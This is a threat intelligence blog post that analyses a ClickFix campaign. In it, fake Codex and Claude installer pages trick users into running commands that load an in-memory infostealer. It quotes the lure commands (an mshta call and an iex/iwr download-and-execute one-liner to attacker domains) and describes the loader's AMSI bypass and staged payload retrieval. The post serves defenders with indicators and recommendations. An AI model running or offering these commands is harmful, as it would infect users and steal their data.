Fake AI Installer Campaign Delivering an In-Memory Stealer via the ClickFix Technique

by Noufal Radhitya, Threat Intelligence Intern @ PT ITSEC Asia Tbk

In these campaigns, users who want to download artificial intelligence (AI)-related software are presented with instructions containing malicious commands disguised as installation steps.

ClickFix is a social engineering technique that emerged in 2024 and was increasingly used by threat actors throughout 2025. If you’ve read the latest threat intelligence report from ITSEC Asia (June 2026), you’ll know that the ClickFix technique is used to distribute stealer malware by manipulating victims into executing malicious PowerShell commands disguised as legitimate actions such as fake error messages, CAPTCHAs, or even verification prompts or scripts. In this blog post, we’ll dissect the latest evolution of the ClickFix technique used to spread stealer malware. The latest campaign discussed in this blog post exploits the popularity of artificial intelligence (AI)-based software, tricking users into executing commands to install AI software that actually downloads and runs malware, including data-stealing programs.

The stealer malware in this research is executed in memory to minimize forensic evidence by integrating it with legit windows powershell.exe process (in-memory), this research shows that file-less execution does not necessarily eliminate all artifacts. While this differs slightly from other external intelligence reports which do not mention an embedded dropper and suggest limited host-based traces. This research identifies several artifacts that can serve as Indicators of Compromise (IOCs), supporting forensic investigations and campaign correlation efforts.

Malware Infection Chain

The malware campaign uses phishing websites designed to closely imitate the legitimate interfaces of OpenAI Codex and Anthropic Claude. By replicating branding, layouts, and visual elements, the threat actors seek to establish trust and increase the likelihood of user interaction.

Many of these phishing pages are hosted on Google Sites (sites.google.com), leveraging the platform’s reputation and search engine visibility. The attackers also use domain names containing terms such as “promo-codex” to attract users with seemingly legitimate discounts or promotional offers related to popular AI tools.

Analysis of the website source code revealed functionality for detecting a visitor’s operating system. Based on the detected environment, the site dynamically modifies its content, including icons, text, and execution instructions, to match the victim’s platform. The delivered commands and installation instructions are obfuscated, making detection and analysis more difficult while increasing the likelihood of successful malware execution.

After being lured by the convincing appearance of the fake Codex and Claude ClickFix campaign websites, victims are instructed to install malware by following the on-screen instructions. The websites direct users to open a PowerShell terminal, copy and paste a provided command, and execute it by pressing Enter. Because the action is performed manually by the user, the operating system treats it as a legitimate user-initiated activity. As a result, many security controls may not immediately classify the behavior as suspicious, even though the command ultimately leads to the execution of malicious code.

The command provided to the victim is:

“mshta https://primemetricsa[.]com/1518925”

Mshta is an official built-in Windows program designed to run HTML-based applications (HTAs). This program allows your computer to open documents that combine HTML, JavaScript, and VBScript code into a standalone application or external resource. Once the script is executed, the terminal will attempt to connect to primemetricsa[.]com to execute a staged PowerShell delivery.

This ClickFix campaign also distributes alternative commands designed to achieve the same objective through different execution mechanisms. One example is the following PowerShell command: “cls; iex(iwr claudescript.top UseBasicParsing).Content” This command begins by executing cls, which clears the PowerShell console window. While this action is not malicious by itself, it can help remove previously displayed output and present a cleaner interface to the victim. The command then uses iwr (an alias for InvokeWebRequest) to retrieve content from the domain claudescript[.]top. The -UseBasicParsing parameter instructs PowerShell to process the web request without relying on Internet Explorer components. Finally, the downloaded content is passed directly to iex (Invoke-Expression), which immediately executes the retrieved code in memory.

However, attempts to execute an alternative script associated with this campaign indicated that the malware delivery infrastructure was either no longer active or had not yet been reactivated by the threat actor. Further investigation was conducted by accessing additional delivery endpoints to assess their operational status. While several endpoints were blocked by Cloudflare and flagged as phishing-related, others remained accessible. This discrepancy suggests that the threat actor leverages path rotation and URL churn techniques as part of their infrastructure strategy to maintain delivery capability and evade security detections.

This research not only focuses on analyzing the distribution methods and infrastructure used in the ClickFix campaign leveraging Codex and Claude lures, but also examines the infection workflow and execution chain employed by the threat actor. When the script provided within the phishing website's instructions was executed, the result was not the download of a legitimate AI application as expected, but rather the execution of malware operating primarily in memory (in-memory execution). The malware integrates its data theft capabilities (infostealer functionality) with legitimate Windows applications and processes, making detection significantly more challenging.

Existing intelligence reports and prior research have suggested that this malware family does not drop any artifacts onto the victim's system. However, findings from this analysis indicate otherwise. The campaign was observed dropping artifacts that may serve as indicators of compromise (IOCs), specifically within the following directory:

“AppData\Local\Microsoft\Windows\INetCache\IE\”

The presence of an artifact named 1518925[1], which closely matches an observed malware delivery endpoint, suggests a potential direct relationship between the host-based artifact and the threat actor's delivery infrastructure. This correlation may provide valuable intelligence for campaign tracking, IOC enrichment, and attribution efforts.

A notable characteristic of this attack is its heavy reliance on in-memory execution techniques. Instead of writing the main payload directly to disk, this malware operates primarily within the system’s RAM. This approach significantly reduces the forensic footprint and helps evade traditional antivirus solutions that rely on file-based detection. During execution, the malicious code can also inject itself into or run alongside legitimate processes, such as powershell.exe, allowing it to blend in with normal system activity and making detection difficult for both users and security products.

After initial execution, the malware sends and executes a malicious stage-1 loader hidden within the powershell.exe process. The threat actor deliberately obfuscates parts of the loader’s code using Base64 encoding to conceal its actual functionality and thwart static analysis efforts. Although Base64 encoding is not encryption in the true cryptographic sense, this method is frequently used by malware operators to disguise malicious commands and evade simple pattern-based detection mechanisms.

The PowerShell script serves as the initial stage of the attack chain. Upon execution, it collects basic system information that can be used to uniquely identify the infected host and assist the threat actor in tracking compromised systems. The script then prepares the execution environment by modifying certain runtime settings to facilitate communication with attacker-controlled infrastructure while reducing potential interference from security mechanisms.

Further analysis reveals memory manipulation behavior through .NET APIs such as Marshal.WriteInt32, which may indicate attempts to bypass or disable security controls including the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW). Such techniques are commonly observed in modern malware families seeking to evade endpoint monitoring and detection capabilities.

After completing these preparatory steps, the script creates a Net.WebClient object to retrieve an additional payload from the domain creativecommunityinfo[.]art. The downloaded content is then executed directly in memory through Invoke-Expression (IEX) without being written to disk. This fileless execution technique is widely used by contemporary infostealers and other malware families because it minimizes forensic traces, complicates incident response efforts, and allows the final payload to remain concealed until the moment of execution.

After the first-stage loader has successfully executed, it proceeds to retrieve a second-stage loader that is concealed within an image file. This technique is commonly associated with steganography, a method used by threat actors to hide malicious content inside seemingly harmless files. By embedding payload data within an image, attackers can disguise malicious components as legitimate web content, making detection more difficult for security solutions and analysts who rely on conventional file inspection methods.

After the image is successfully downloaded and processed by the first-stage loader, the victim’s device initiates outbound network communications to an external server controlled by the threat actor. Based on the observed infection chain and network activity, this communication likely supports subsequent stages of the malware operation, such as payload delivery, configuration retrieval, or data exfiltration. Through these network interactions, the malware may collect and transmit sensitive information, including browser data, email-related information, and cryptocurrency wallet artifacts. This is an illustration of the attack flow of a campaign that results in a malware infection

Recommendation

1. Strengthen User Awareness
   Educate users about ClickFix-style social engineering attacks and the risks of executing commands from untrusted websites.
   
2. Harden PowerShell and Script Execution
   Restrict unnecessary PowerShell usage, enable comprehensive logging, and monitor for suspicious script execution activities.
   
3. Enhance Network Security
   Block identified malicious domains, URLs, and IP addresses, and monitor outbound connections for potential command-and-control (C2) communications.
   
4. Improve Endpoint Detection and Response
   Monitor for PowerShell abuse, MSHTA execution, fileless malware activity, and anomalous process behavior indicative of compromise.
   
5. Strengthen Threat Hunting and Threat Intelligence
   Conduct proactive threat hunting, leverage up-to-date threat intelligence, and regularly validate security controls through phishing simulations and security assessments.

Indicator of Compromise